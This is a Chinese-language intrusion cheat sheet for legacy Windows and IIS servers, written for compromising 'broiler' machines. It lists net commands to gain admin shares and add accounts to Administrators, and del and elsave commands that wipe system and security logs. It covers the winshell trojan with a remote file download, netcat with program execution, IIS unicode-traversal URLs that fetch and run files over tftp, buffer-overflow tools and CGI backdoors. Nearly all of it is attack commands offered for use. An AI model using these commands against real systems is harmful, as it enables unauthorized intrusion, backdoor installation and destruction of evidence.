常用的幾條net命令:
(與遠程主機建立空管連接) net use \\ip地址\ipc$ "" /use:""
(以管理員身份登錄遠程主機) net use \\ip地址\ipc$ "密碼" /use:"administrator"
(傳送文件到遠程主機winnt目錄下)copy 本機目錄路徑\程序 \\ip地址\admin$
(查看遠程主機時間) net time \\ip地址
(定時啟動某個程序) at \\ip地址 02:18 readme.exe
(查看共享) net view \\ip地址
(查看netbios工作組列表) nbtstat -a ip地址
(將遠程主機c盤映射為自己的f盤) net use f: \\ip地址\c$ ""/user:"administrator"
(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add
(斷開連接) net use \\ip地址\ipc$ /delete
掃尾:
del c:\winnt\system32\logfiles\*.*
del c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
一、netsvc.exe
下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:
netsvc /list \\ip地址
netsvc schedule \\ip地址 /query
netsvc \\ip地址 schedule /start
二、opentelnet.exe
遠程啟動主機的telnet服務,并綁定端口到7878,例如:
opentelnet \\ip地址 用戶名 密碼 1 7878
然后就可以telnet到主機的7878端口,進入dos方式下:
telnet ip地址 7878
三、winshell.exe
一個非常小的木馬(不到6k),telnet到主機的7878端口,輸入密碼winshell,當看到cmd>后,可打下面的命令:
p path (查看winshell主程序的路徑信息)
b reboot (重新啟動機器)
d shutdown (關閉機器)
s shell (執行后你就會看到可愛的“c:\>”)
x exit (退出本次登錄會話,此命令并不終止winshell的運行)
cmd> http://.../srv.exe (通過http下載其他網站上的文件到運行winshell的機器上)
四、3389登陸器,gui方式登錄遠程主機的
五、elsave.exe
事件日志清除工具
elsave -s \\ip地址 -l "application" -c
elsave -s \\ip地址 -l "system" -c
elsave -s \\ip地址 -l "security" -c
執行后成功清除應用程序日志,系統日志,安全日志
六、hbulot.exe
開啟win2kserver和winxp的3389服務
hbulot [/r]
使用/r表示安裝完成后自動重起目標使設置生效。
七、nc.exe(netcat.exe)
一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。
想要連接到某處: nc [-options] hostname port[s] [ports] ...
綁定端口等待連接: nc -l -p port [-options] [hostname] [port]
參數:
-e prog 程序重定向,一旦連接,就執行 [危險!!]
-g gateway source-routing hop point[s], up to 8
-g num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i secs 延時的間隔
-l 監聽模式,用於入站連接
-n 指定數字的ip地址,不能用hostname
-o file 記錄16進制的傳輸
-p port 本地端口號
-r 任意指定本地及遠程端口
-s addr 本地源地址
-u udp模式
-v 詳細輸出——用兩個-v可得到更詳細的內容
-w secs timeout的時間
-z 將輸入輸出關掉——用於掃描時
八、tftpd32.exe
把自己的電腦臨時變為一臺ftp服務器,讓肉雞來下載文件,tftp命令要在肉雞上執行,通常要利用unicode漏洞或telnet到肉雞,例如:
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機ip地址 get 文件名 c:\winnt\system32\文件名
然后可以直接令文件運行:
http://ip地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是iis的printer遠程緩沖區溢出工具
idqover.exe是溢出idq的,選擇“溢出后在一個端口監聽”,然后用telnet連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。xploit.exe是一個圖形界面的ida溢出,成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有asp執行權限的目錄。然后用ie瀏覽器連接。